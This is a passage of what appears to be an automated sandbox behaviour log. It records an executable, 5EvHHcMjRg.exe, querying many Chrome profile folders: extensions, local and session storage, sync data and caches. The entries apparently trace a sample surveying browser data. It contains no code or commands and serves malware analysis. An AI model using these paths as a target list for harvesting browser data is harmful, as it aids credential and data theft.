Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OptimizationHints VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\PKIMetadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\hyphen-data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\AutofillStates VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\CommerceHeuristics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\AutofillStrikeDatabase VolumeInformation	Jump to behavior
